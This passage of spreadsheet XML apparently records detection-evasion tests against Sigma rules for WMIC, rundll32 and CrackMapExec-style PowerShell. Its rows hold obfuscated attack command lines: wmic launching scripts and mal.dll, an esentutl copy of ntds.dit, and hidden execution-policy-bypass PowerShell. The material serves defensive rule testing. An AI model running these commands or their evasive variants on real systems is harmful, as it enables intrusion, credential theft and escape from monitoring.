      <c r="A207" s="43" t="n"/>
      <c r="B207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C207" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D207" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E207" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F207" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G207" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H207" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="43" t="n"/>
      <c r="J207" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C208" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D208" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E208" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F208" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H208" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="43" t="n"/>
      <c r="J208" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="n"/>
      <c r="B209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C209" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D209" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E209" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F209" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G209" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="43" t="n"/>
      <c r="J209" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C210" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D210" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E210" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript /"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="n"/>
      <c r="B211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C211" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D211" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E211" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="43" t="n"/>
      <c r="J211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C212" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D212" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E212" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="43" t="n"/>
      <c r="J212" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C213" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D213" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E213" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="43" t="n"/>
      <c r="J213" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C214" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D214" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E214" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="43" t="n"/>
      <c r="J214" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C215" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D215" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E215" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="n"/>
      <c r="B216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C216" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D216" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E216" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="43" t="n"/>
      <c r="J216" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="n"/>
      <c r="B217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C217" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D217" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E217" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="43" t="n"/>
      <c r="J217" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="n"/>
      <c r="B218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C218" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D218" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E218" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="n"/>
      <c r="B219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C219" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D219" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E219" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="43" t="n"/>
      <c r="J219" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="n"/>
      <c r="B220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C220" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D220" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E220" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="43" t="n"/>
      <c r="J220" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="n"/>
      <c r="B221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C221" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D221" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E221" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="43" t="n"/>
      <c r="J221" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K221" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="n"/>
      <c r="B222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C222" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D222" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E222" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="44" t="n"/>
      <c r="J222" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C223" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D223" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E223" s="44" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:"localhost" process   call   create "cmd.exe /c esentutl.exe /y /vss c:\windows
tds
tds.dit /d c:
tds.dit"</t>
        </is>
      </c>
      <c r="F223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="44" t="n"/>
      <c r="J223" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C224" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D224" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E224" s="44" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:127.0.0.1 "process" "call" "create" "rundll32.exe "C:\AtomicRedTeam\atomics\..\ExternalPayloads\calc.dll" StartW"</t>
        </is>
      </c>
      <c r="F224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="44" t="n"/>
      <c r="J224" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C225" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D225" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E225" s="44" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:"localhost" process call create "cmd.ex"e /c esentutl.exe /y /vss c:\windows
tds
tds.dit /d c:
tds.dit"</t>
        </is>
      </c>
      <c r="F225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="44" t="n"/>
      <c r="J225" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K225" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="n"/>
      <c r="B226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C226" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D226" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E226" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOp -noNi /"w" 1 -ExeC bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="44" t="n"/>
      <c r="J226" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K226" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C227" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D227" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E227" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="43" t="n"/>
      <c r="J227" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K227" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="n"/>
      <c r="B228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C228" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D228" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E228" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noni -W 1 /"exec" bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="n"/>
      <c r="J228" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C229" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D229" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E229" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noNI /"w" 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="n"/>
      <c r="J229" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C230" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D230" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E230" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" -noni -w 1 -eXeC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="43" t="n"/>
      <c r="J230" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="n"/>
      <c r="B231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C231" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D231" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E231" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"noni" -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="44" t="n"/>
      <c r="J231" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="n"/>
      <c r="B232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C232" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D232" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E232" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -NonInteractive -WinDOwsTYle Hidden -ep Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="n"/>
      <c r="J232" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="n"/>
      <c r="B233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C233" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D233" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E233" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"NonInteractive" -"WindowStyle" Hidden /"ExecutionPolicy" Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="43" t="n"/>
      <c r="J233" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="n"/>
      <c r="B234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C234" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D234" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E234" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"NonInteractive" -"WindowStyle" Hidden -"ExecutionPolicy" Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="43" t="n"/>
      <c r="J234" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="n"/>
      <c r="B235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C235" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D235" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
